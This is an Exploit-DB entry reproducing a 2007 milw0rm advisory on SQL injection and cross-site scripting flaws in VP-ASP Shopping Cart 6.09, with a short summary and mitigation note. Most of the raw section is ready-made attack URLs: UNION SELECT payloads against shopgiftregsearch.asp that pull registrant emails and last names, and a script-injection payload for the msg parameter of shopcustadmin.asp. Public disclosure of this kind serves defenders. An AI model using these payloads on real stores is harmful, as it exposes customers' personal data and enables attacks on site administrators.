VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities

vendor:

VP-ASP Shopping Cart

by:

ajann

7.5

CVSS

HIGH

Remote Multiple Vulnerabilities

CWE

Product Name: VP-ASP Shopping Cart

Affected Version From: 06.09

Affected Version To: 06.09

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities

The VP-ASP Shopping Cart 6.09 is vulnerable to SQL Injection and Cross-Site Scripting (XSS) attacks. An attacker can exploit the SQL Injection vulnerability by sending a specially crafted request to the 'shopgiftregsearch.asp' page. This can lead to unauthorized access to the backend database. The XSS vulnerability can be exploited by injecting malicious code into the 'msg' parameter of the 'shopcustadmin.asp' page, which is not properly sanitized before being displayed to the users.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user input before using it in SQL queries and to implement proper input validation and output encoding to prevent XSS attacks.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.vpasp.com
# $$      :  $49.00 - $350.00 - $495.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//shopgiftregsearch.asp?LoginLastname=[SQL]

Example:

//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1

This Informations go to login page.

[[/SQL]]

[[XSS]]]---------------------------------------------------------

http://[target]/[path]//shopcustadmin.asp?msg=[XSS]

Example:

//shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

[[/XSS]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-11]